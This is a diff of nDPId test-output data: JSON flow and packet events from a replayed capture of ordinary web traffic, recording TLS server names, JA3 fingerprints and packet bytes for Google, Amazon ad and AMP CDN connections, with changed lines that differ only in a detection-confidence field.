
+00997{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9099,"source":"reddit.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690384,"flow_last_seen":1605291690449,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690449,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2002","src_port":59336,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"adservice.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9105,"source":"reddit.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1605291690449,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690449,"pkt":"qtsDr8lk5EKm5WPyht1gBJW4ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICwAAAAAAACAB6OgBu5zTDYT7zrVEgBAB++0WAAABAQgKXwTqpcLXSbc="} 
-01010{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9112,"source":"reddit.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690421,"flow_last_seen":1605291690449,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690449,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2001","src_port":59624,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"8a755a3fef0b189d8ab5b0d10758f68a.safeframe.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01051{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9134,"source":"reddit.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690421,"flow_last_seen":1605291690483,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690483,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2001","src_port":59624,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"8a755a3fef0b189d8ab5b0d10758f68a.safeframe.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9160,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690405,"flow_last_seen":1605291690501,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":1877,"flow_avg_l4_payload_len":312,"midstream":0,"thread_ts_msec":1605291690501,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::345f:7ca5","src_port":46646,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"aax-eu.amazon-adsystem.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"49b45fc1ab090aa3a159778313fc9b9e","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01317{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9166,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1605291690405,"flow_last_seen":1605291690502,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":5957,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1605291690502,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::345f:7ca5","src_port":46646,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"aax-eu.amazon-adsystem.com","server_names":"aax-eu.amazon-adsystem.com,aax.amazon-adsystem.com,aax-cpm.amazon-adsystem.com,aax-dtb-web.amazon-adsystem.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"49b45fc1ab090aa3a159778313fc9b9e","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Amazon, OU=Server CA 1B, CN=Amazon","subjectDN":"CN=aax-eu.amazon-adsystem.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"5D:18:8E:CB:B7:91:5C:79:26:B5:08:49:FF:2C:24:D8:06:54:91:8B"}} +01010{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9112,"source":"reddit.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690421,"flow_last_seen":1605291690449,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690449,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2001","src_port":59624,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"8a755a3fef0b189d8ab5b0d10758f68a.safeframe.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+01051{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9134,"source":"reddit.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690421,"flow_last_seen":1605291690483,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690483,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2001","src_port":59624,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"8a755a3fef0b189d8ab5b0d10758f68a.safeframe.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9160,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690405,"flow_last_seen":1605291690501,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":1877,"flow_avg_l4_payload_len":312,"midstream":0,"thread_ts_msec":1605291690501,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::345f:7ca5","src_port":46646,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"aax-eu.amazon-adsystem.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"49b45fc1ab090aa3a159778313fc9b9e","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01317{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9166,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1605291690405,"flow_last_seen":1605291690502,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":5957,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1605291690502,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::345f:7ca5","src_port":46646,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"aax-eu.amazon-adsystem.com","server_names":"aax-eu.amazon-adsystem.com,aax.amazon-adsystem.com,aax-cpm.amazon-adsystem.com,aax-dtb-web.amazon-adsystem.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"49b45fc1ab090aa3a159778313fc9b9e","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Amazon, OU=Server CA 1B, CN=Amazon","subjectDN":"CN=aax-eu.amazon-adsystem.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"5D:18:8E:CB:B7:91:5C:79:26:B5:08:49:FF:2C:24:D8:06:54:91:8B"}} 
00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9279,"source":"reddit.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690926,"flow_last_seen":1605291690926,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690926,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46806,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9279,"source":"reddit.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1605291690926,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690926,"pkt":"qtsDr8lk5EKm5WPyht1gDDgdACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACABttYBu\/eX0dQAAAAAoAL9IKwyAAACBAWgBAIIChrDFp8AAAAAAQMDBw=="} 00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9280,"source":"reddit.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690926,"flow_last_seen":1605291690926,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690926,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46808,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -334,116 +334,116 @@ 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9288,"source":"reddit.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1605291690926,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690926,"pkt":"qtsDr8lk5EKm5WPyht1gCQMiACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGoBuxhoCyUAAAAAoAL9ILYPAAACBAWgBAIICriVOzQAAAAAAQMDBw=="} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9293,"source":"reddit.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1605291690952,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690952,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgIAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbu21pGefV\/3l9HVoBJXgDRiAAACBAV4AQMDAwQCCArC10u2GsMWnw=="} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9294,"source":"reddit.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1605291690952,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690952,"pkt":"qtsDr8lk5EKm5WPyht1gDDgdACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACABttYBu\/eX0dWRnn1ggBAB+7hZAAABAQgKGsMWucLXS7Y="} 
-00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9298,"source":"reddit.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690953,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690953,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46806,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9298,"source":"reddit.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690953,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690953,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46806,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9300,"source":"reddit.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1605291690954,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690954,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgIAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbu22KVwltPCUkXloBJXgMhIAAACBAV4AQMDAwQCCArC10u9GsMWnw=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9301,"source":"reddit.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1605291690954,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690954,"pkt":"qtsDr8lk5EKm5WPyht1gDtx5ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACABttgBu8JSReWlcJbUgBAB+0w+AAABAQgKGsMWu8LXS70="} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9302,"source":"reddit.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1605291690954,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690954,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgIAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbu22it1t9ZMt7NvoBJXgClQAAACBAV4AQMDAwQCCArC10u9GsMWnw=="} 
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9303,"source":"reddit.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1605291690954,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690954,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgIAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbu23LTmo6vQxszqoBJXgBZ9AAACBAV4AQMDAwQCCArC10u9GsMWnw=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9304,"source":"reddit.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1605291690954,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690954,"pkt":"qtsDr8lk5EKm5WPyht1gDhnPACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACABttoBu0y3s28rdbfXgBAB+61FAAABAQgKGsMWu8LXS70="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9305,"source":"reddit.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":1605291690954,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690954,"pkt":"qtsDr8lk5EKm5WPyht1gAc2lACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACABttwBu9DGzOq05qOsgBAB+5pyAAABAQgKGsMWu8LXS70="} 
-00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9306,"source":"reddit.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690954,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690954,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46808,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9307,"source":"reddit.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690954,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690954,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46810,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9308,"source":"reddit.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690955,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690955,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46812,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9306,"source":"reddit.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690954,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690954,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46808,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9307,"source":"reddit.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690954,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690954,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46810,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9308,"source":"reddit.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690955,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690955,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46812,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9309,"source":"reddit.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1605291690955,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690955,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgIAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbu23lfa6eczuyRVoBJXgHLsAAACBAV4AQMDAwQCCArC10u9GsMWnw=="} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9310,"source":"reddit.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1605291690955,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690955,"pkt":"qtsDr8lk5EKm5WPyht1gClWEACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACABtt4BuzO7JFVX2unogBAB+\/bgAAABAQgKGsMWvMLXS70="} 